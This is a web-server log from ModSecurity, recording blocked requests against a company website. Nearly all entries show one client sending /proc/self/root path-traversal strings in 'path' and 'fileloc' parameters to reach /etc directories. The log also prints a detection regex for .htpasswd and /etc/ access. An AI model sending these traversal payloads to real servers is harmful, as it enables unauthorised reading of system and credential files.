[Mon Mar 16 12:04:49.855604 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.243.203:41008] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcEbABkC4fWIHEf8HnYQAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:05:00.390707 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.243.203:38110] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcHLysWC90G-1nBrBCAgAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:05:03.793278 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.243.203:39808] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcH7ysWC90G-1nBrBCCAAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:05:07.253403 2026] [:error] [pid 32654:tid 140411565680384] [client 74.7.243.203:39824] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcIwlT9VtDQc7bgUysbQAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:05:19.267590 2026] [:error] [pid 10709:tid 140411624429312] [client 74.7.243.203:39830] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcLxXjF1vJNtV6CWrzDwAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:05:23.855138 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.243.203:44274] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcMwlT9VtDQc7bgUyseAAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:05:27.189179 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.243.203:44278] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcN3bQATo66fKoS7xLaQAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:05:32.982801 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.243.203:44290] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcPLABkC4fWIHEf8HnZwAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:05:35.346149 2026] [:error] [pid 32654:tid 140411548894976] [client 74.7.243.203:45266] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcPwlT9VtDQc7bgUysfQAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:05:36.642166 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.243.203:45278] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcQI6lpbStxTqkSktpQAAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:06:26.912275 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.228.16:54128] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgccrABkC4fWIHEf8HnbAAAAE4"]
[Mon Mar 16 12:06:30.775026 2026] [:error] [pid 21946:tid 140411607643904] [client 74.7.243.203:45288] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcdnbQATo66fKoS7xLzQAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:06:42.283574 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.243.203:41830] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcgnbQATo66fKoS7xL2AAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:06:48.218628 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.243.203:55524] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgciJqj1wV0Si-OkefpSgAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:06:49.657007 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.243.203:55526] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgciQlT9VtDQc7bgUyshwAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:06:51.998344 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.243.203:38602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgci9SswJuvopo3lOhapQAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:06:53.359199 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.243.203:38612] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcjXjZBu2q05ozVU9TrwAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:06:54.685925 2026] [:error] [pid 21946:tid 140411691570944] [client 74.7.243.203:38616] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcjnbQATo66fKoS7xL2wAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:06:58.032828 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.243.203:38628] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgckrABkC4fWIHEf8HncAAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:07:02.523006 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.243.203:38642] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgclv9ocpUE4ed4uDzq-QAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:07:04.940297 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:35816] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcmP9ocpUE4ed4uDzq_AAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:07:06.227299 2026] [:error] [pid 11972:tid 140411658000128] [client 74.7.243.203:35828] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgcmpqj1wV0Si-OkefpSwAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
